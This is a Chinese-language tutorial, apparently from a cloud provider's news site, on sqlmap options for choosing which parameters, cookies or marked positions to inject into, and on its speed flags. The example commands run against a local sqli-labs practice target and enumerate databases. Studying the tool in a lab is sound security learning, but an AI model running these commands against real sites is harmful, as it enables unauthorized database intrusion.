溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
注入工具sqlmap如何指定位置注入和優化性能,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
一、指定位置注入
1、-p,指定具體探測的參數
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 對id進行探測
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p “id,name” --dbs 對id和name都進行探測
2、–skip,忽略探測的參數
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --level 5 --skip host --dbs 5級對所有存在的注入點進行探測,這里忽略了host
3、–param-exclude,忽略包含具體內容的參數
–param-exclude=“id|name”
4、–skip-static 忽略非動態參數
5、用“*”指定注入位置,
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1*&&name=2*&&tab=3 --dbs
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie=“un=adm*;pw=adm”–dbs
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="*"–dbs
二、優化性能
1、設置連接為持久連接
http報文中設置Connection:Keep-Alive
sqlmap中加參數 --keep-alive
2、設置不接受http當中的body,常用在盲注
–null-connection
3、設置多線程
–thread 默認是1個線程,最大線程為10
4、預測輸出
–predict-output,不能與thread同時用
5、開啟所有優化
-o
看完上述內容,你們掌握注入工具sqlmap如何指定位置注入和優化性能的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
